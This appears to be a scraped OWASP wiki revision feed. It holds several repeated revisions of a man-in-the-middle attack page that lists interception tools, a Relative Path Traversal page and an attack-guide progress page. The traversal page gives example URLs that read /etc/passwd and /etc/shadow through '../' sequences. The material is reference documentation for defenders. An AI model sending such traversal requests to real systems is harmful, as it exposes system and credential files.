Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. <br />
<br />
<center><br />
[[Image:main_the_middle.JPG]]<br />
<br />
Figure 1. Illustration of man-in-the-middle attack<br />
</center><br />
<br />
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are all ASCII based. This way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.<br />
<br />
<center><br />
[[Image:request.JPG]]<br />
<br />
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.<br />
</center><br />
<br />
The MITM attack could also be done over https connection by using the same technique, the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with attacker and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.<br />
<br />
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.<br />
<br />
===MITM Attack tools===<br />
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.<br />
<br />
* PacketCreator<br />
* Ettercap<br />
* Dsniff<br />
* Cain e Abel<br />
<br />
===MITM Proxy only tools===<br />
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser <br />
<br />
* OWASP WebScarab<br />
* Paros Proxy<br />
* Burp Proxy<br />
* ProxyFuzz<br />
* Odysseus Proxy<br />
<br />
==Severity==<br />
High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==External References==<br />
*http://www.sans.org/reading_room/whitepapers/threats/480.php<br />
* http://cwe.mitre.org/data/definitions/300.html<br />
*http://en.wikipedia.org/wiki/Mitm<br />
<br />
==Related Threats==<br />
[[:Category:Authentication]]<br />
<br />
[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
[[Man-in-the-browser_attack]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Session Management Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
*[[Session Management]]<br />
<br />
[[Category:Spoofing]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23074Man-in-the-middle attack2007-11-05T17:01:42Z<p>Nsrav: /* Related Attacks */</p>
<hr />
<div>{{Template:attack}}<br />
<br />
==Description==<br />
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.<br />
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. <br />
<br />
<center><br />
[[Image:main_the_middle.JPG]]<br />
<br />
Figure 1. Illustration of man-in-the-middle attack<br />
</center><br />
<br />
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are all ASCII based. This way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.<br />
<br />
<center><br />
[[Image:request.JPG]]<br />
<br />
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.<br />
</center><br />
<br />
The MITM attack could also be done over https connection by using the same technique, the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with attacker and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.<br />
<br />
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.<br />
<br />
===MITM Attack tools===<br />
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.<br />
<br />
* PacketCreator<br />
* Ettercap<br />
* Dsniff<br />
* Cain e Abel<br />
<br />
===MITM Proxy only tools===<br />
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser <br />
<br />
* OWASP WebScarab<br />
* Paros Proxy<br />
* Burp Proxy<br />
* ProxyFuzz<br />
* Odysseus Proxy<br />
<br />
==Severity==<br />
High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==External References==<br />
*http://www.sans.org/reading_room/whitepapers/threats/480.php<br />
* http://cwe.mitre.org/data/definitions/300.html<br />
*http://en.wikipedia.org/wiki/Mitm<br />
<br />
==Related Threats==<br />
[[:Category:Authentication]]<br />
<br />
[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
[[Man-in-the-browser_attack]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Session Management Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
*[http://cwe.mitre.org/data/definitions/295.html Digital Certificate]<br />
*[[Session Management]]<br />
<br />
[[Category:Spoofing]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23073Man-in-the-middle attack2007-11-05T17:00:45Z<p>Nsrav: /* Related Threats */</p>
<hr />
<div>{{Template:attack}}<br />
<br />
==Description==<br />
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.<br />
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. <br />
<br />
<center><br />
[[Image:main_the_middle.JPG]]<br />
<br />
Figure 1. Illustration of man-in-the-middle attack<br />
</center><br />
<br />
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are all ASCII based. This way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.<br />
<br />
<center><br />
[[Image:request.JPG]]<br />
<br />
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.<br />
</center><br />
<br />
The MITM attack could also be done over https connection by using the same technique, the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with attacker and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.<br />
<br />
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.<br />
<br />
===MITM Attack tools===<br />
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.<br />
<br />
* PacketCreator<br />
* Ettercap<br />
* Dsniff<br />
* Cain e Abel<br />
<br />
===MITM Proxy only tools===<br />
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser <br />
<br />
* OWASP WebScarab<br />
* Paros Proxy<br />
* Burp Proxy<br />
* ProxyFuzz<br />
* Odysseus Proxy<br />
<br />
==Severity==<br />
High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==External References==<br />
*http://www.sans.org/reading_room/whitepapers/threats/480.php<br />
* http://cwe.mitre.org/data/definitions/300.html<br />
*http://en.wikipedia.org/wiki/Mitm<br />
<br />
==Related Threats==<br />
[[:Category:Authentication]]<br />
<br />
[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
*[http://www.sans.org/reading_room/whitepapers/threats/480.php SSL man-in-the-middle attack]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Session Management Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
*[http://cwe.mitre.org/data/definitions/295.html Digital Certificate]<br />
*[[Session Management]]<br />
<br />
[[Category:Spoofing]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23072Man-in-the-middle attack2007-11-05T17:00:04Z<p>Nsrav: /* Description */</p>
<hr />
<div>{{Template:attack}}<br />
<br />
==Description==<br />
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.<br />
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. <br />
<br />
<center><br />
[[Image:main_the_middle.JPG]]<br />
<br />
Figure 1. Illustration of man-in-the-middle attack<br />
</center><br />
<br />
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are all ASCII based. This way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.<br />
<br />
<center><br />
[[Image:request.JPG]]<br />
<br />
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.<br />
</center><br />
<br />
The MITM attack could also be done over https connection by using the same technique, the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with attacker and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.<br />
<br />
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.<br />
<br />
===MITM Attack tools===<br />
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.<br />
<br />
* PacketCreator<br />
* Ettercap<br />
* Dsniff<br />
* Cain e Abel<br />
<br />
===MITM Proxy only tools===<br />
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser <br />
<br />
* OWASP WebScarab<br />
* Paros Proxy<br />
* Burp Proxy<br />
* ProxyFuzz<br />
* Odysseus Proxy<br />
<br />
==Severity==<br />
High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==External References==<br />
*http://www.sans.org/reading_room/whitepapers/threats/480.php<br />
* http://cwe.mitre.org/data/definitions/300.html<br />
*http://en.wikipedia.org/wiki/Mitm<br />
<br />
==Related Threats==<br />
[[:Category:Authentication]]<br />
[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
*[http://www.sans.org/reading_room/whitepapers/threats/480.php SSL man-in-the-middle attack]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Session Management Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
*[http://cwe.mitre.org/data/definitions/295.html Digital Certificate]<br />
*[[Session Management]]<br />
<br />
[[Category:Spoofing]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Relative_Path_Traversal&diff=23071Relative Path Traversal2007-11-05T16:59:51Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
This attack is a variant of Path Traversal and can be exploited when the application accepts the use of relative traversal sequences such as "../".<br />
<br />
More detailed information can be found on [[Path_Traversal]]<br />
<br />
== Severity ==<br />
<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
<br />
High <br />
<br />
==Examples ==<br />
<br />
The following URLs are vulnerable to this attack:<br />
<br />
<nowiki> http://some_site.com.br/get-files.jsp?file=report.pdf </nowiki><br />
<nowiki> http://some_site.com.br/get-page.php?home=aaa.html </nowiki><br />
<nowiki> http://some_site.com.br/some-page.asp?page=index.html </nowiki><br />
<br />
A simple way to execute this attack is like this:<br />
<br />
<nowiki> http://some_site.com.br/get-files?file=../../../../some dir/some file </nowiki><br />
<nowiki> http://some_site.com.br/../../../../etc/shadow </nowiki><br />
<nowiki> http://some_site.com.br/get-files?file=../../../../etc/passwd </nowiki><br />
<br />
==Related Threats==<br />
<br />
[[: Category: Information Disclosure]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Path Manipulation]]<br />
*[[ Path Traversal]]<br />
*[[ Resource Injection]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
[[:Category:Input Validation]]<br />
<br />
<br />
[[Category: Resource Manipulation]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23070Man-in-the-middle attack2007-11-05T16:59:23Z<p>Nsrav: </p>
<hr />
<div>{{Template:attack}}<br />
<br />
==Description==<br />
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.<br />
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. <br />
<br />
<center><br />
[[Image:main_the_middle.JPG]]<br />
Figure 1. Illustration of man-in-the-middle attack<br />
</center><br />
<br />
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are all ASCII based. This way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.<br />
<br />
<center><br />
[[Image:request.JPG]]<br />
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.<br />
</center><br />
<br />
The MITM attack could also be done over https connection by using the same technique, the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with attacker and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.<br />
<br />
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.<br />
<br />
===MITM Attack tools===<br />
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.<br />
<br />
* PacketCreator<br />
* Ettercap<br />
* Dsniff<br />
* Cain e Abel<br />
<br />
===MITM Proxy only tools===<br />
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser <br />
<br />
* OWASP WebScarab<br />
* Paros Proxy<br />
* Burp Proxy<br />
* ProxyFuzz<br />
* Odysseus Proxy<br />
<br />
==Severity==<br />
High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==External References==<br />
*http://www.sans.org/reading_room/whitepapers/threats/480.php<br />
* http://cwe.mitre.org/data/definitions/300.html<br />
*http://en.wikipedia.org/wiki/Mitm<br />
<br />
==Related Threats==<br />
[[:Category:Authentication]]<br />
[[:Category:Client-side Attacks]]<br />
<br />
==Related Attacks==<br />
*[http://www.sans.org/reading_room/whitepapers/threats/480.php SSL man-in-the-middle attack]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Session Management Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
*[http://cwe.mitre.org/data/definitions/295.html Digital Certificate]<br />
*[[Session Management]]<br />
<br />
[[Category:Spoofing]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&diff=23069SpoC 007 - Attacks Reference Guide - Progress Page2007-11-05T16:58:39Z<p>Nsrav: /* Phase 2 - DONE! */</p>
<hr />
<div>[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] <br />
<br />
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]<br />
<br />
<br />
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:<br />
<br />
# Attack list revision and description (75% of the project)<br />
# Attacks categorization (40% of the project)<br />
# Research and describe new attacks (80% of the project)<br />
<br />
Total project status: '''90% Done!'''<br />
<br />
== CheckPoints and Decision ==<br />
<br />
===Phase 1 - 90% Done ===<br />
* Attack List Revision: '''Done!'''<br />
Total number of items on the Attack Guide: '''91'''!<br />
<br />
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.<br />
<br />
Items considered to removal from the attack list: '''30 items''', as follows:<br />
<br />
**[[API_Abuse]]<br />
**[[Cross_Site_Scripting]]<br />
**[[Cross-Site_Scripting]]<br />
**[[CSRF]]<br />
**[[Internal_software_developer]]<br />
**[[Interpreter_Injection]]<br />
**[[Link_Following]]<br />
**[[Log_forging]]<br />
**[[Logic/time_bomb]]<br />
**[[Macro_symbol]]<br />
**[[Network_amplification]]<br />
**[[One-Click_Attack]]<br />
**[[OS_Injection]]<br />
**[[OS_Command_Injection]]<br />
**[[PRNG_permanent_compromise_attack]]<br />
**[[Reviewing_Code_for_OS_Injection]]<br />
**[[Script_in_IMG_tags]]<br />
**[[Sniffing_application_traffic_attack]]<br />
**[[Template:Attack]]<br />
**[[Unquoted_Search_Path_or_Element]]<br />
**[[Web_problems]]<br />
**[[Wildcard_or_Matching_Element]]<br />
**[[Windows_::DATA_alternate_data_stream]]<br />
**[[Windows_hard_link]]<br />
**[[Windows_MS-DOS_device_names]]<br />
**[[Windows_Path_Link_problems]]<br />
**[[Windows_Shortcut_Following_%28.LNK%29]]<br />
**[[Windows_Virtual_File_problems]]<br />
**[[XSS_Attacks]]<br />
**[[XSRF]]<br />
<br />
* Attacks Description: '''48 of 59 items done'''!<br />
* Attacks and content just reviewed '''2 items'''!<br />
**[[HTTP_Response_Splitting]]<br />
**[[SQL_Injection]]<br />
<br />
===Phase 2 - DONE! ===<br />
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. <br />
<br />
The categories defined are:<br />
* [[:Category:Abuse of Functionality]]<br />
* [[:Category:Spoofing]]<br />
* [[:Category:Probabilistic Techniques]]<br />
* [[:Category:Exploitation of Authentication]]<br />
* [[:Category:Resource Depletion]]<br />
* Exploitation of Privilege/Trust<br />
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)<br />
* [[:Category:Data_Structure_Attacks]]<br />
* Data Leakage Attacks<br />
* [[:Category:Resource Manipulation]]<br />
* Protocol Manipulation<br />
* Time and State Attacks<br />
<br />
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.<br />
<br />
===Phase 3 ===<br />
Research and Description of new attacks(under revision):<br />
<br />
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]<br />
** [[Buffer_Overflow_via_Environment_Variables]]<br />
** [[Cross_Frame_Scripting]]<br />
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Overflow_Binary_Resource_File]]<br />
** [[Session_Prediction]]<br />
<br />
=== Work Done ===<br />
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file<br />
<br />
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).<br />
<br />
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&diff=20797&oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&action=history history])<br />
<br />
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&diff=22071&oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&action=history history])<br />
<br />
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&diff=20712&oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&action=history history])<br />
<br />
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&diff=20649&oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&action=history history])<br />
<br />
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&diff=22173&oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&action=history history])<br />
<br />
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&diff=20874&oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&action=history history])<br />
<br />
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&diff=21145&oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&action=history history])<br />
<br />
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&diff=22072&oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&action=history history history])<br />
<br />
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&diff=22725&oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&action=history history])<br />
<br />
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&diff=22727&oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&action=history history])<br />
<br />
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&diff=21449&oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&action=history history])<br />
<br />
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&diff=22073&oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&action=history history])<br />
<br />
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&diff=20667&oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&action=history history])<br />
<br />
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&diff=20873&oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&action=history history])<br />
<br />
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&diff=22728&oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&action=history history])<br />
<br />
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&diff=20794&oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&action=history history])<br />
<br />
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&diff=20886&oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&action=history history])<br />
<br />
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&diff=22733&oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&action=history history])<br />
<br />
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&diff=22734&oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&action=history history])<br />
<br />
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&diff=20884&oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&action=history history])<br />
<br />
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&diff=22761&oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&action=history history])<br />
<br />
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&diff=22775&oldid=7392 diff] , [https://www.owasp.org/index.php?title=Traffic_flood&action=history history])<br />
<br />
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&diff=22756&oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&action=history history])<br />
<br />
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&diff=22729&oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&action=history history])<br />
<br />
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&diff=20883&oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&action=history history])<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])<br />
<br />
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&diff=22637&oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&action=history history])<br />
<br />
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&diff=22638&oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&action=history history])<br />
<br />
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&diff=22641&oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&action=history history])<br />
<br />
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&diff=22642&oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&action=history history])<br />
<br />
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&diff=22647&oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&action=history history])<br />
<br />
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&diff=22651&oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&action=history history])<br />
<br />
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&diff=22654&oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&action=history history])<br />
<br />
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&diff=22643&oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&action=history history])<br />
<br />
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&diff=22658&oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&action=history history])<br />
<br />
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&diff=22660&oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&action=history history])<br />
<br />
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&diff=22661&oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&action=history history])<br />
<br />
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&diff=22662&oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&action=history history])<br />
<br />
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])<br />
<br />
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&diff=22954&oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&action=history history])<br />
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&diff=22956&oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&action=history history])<br />
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&diff=22957&oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&action=history history])<br />
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&diff=22959&oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&action=history history])<br />
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&diff=22960&oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&action=history history])<br />
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&diff=22961&oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&action=history history])<br />
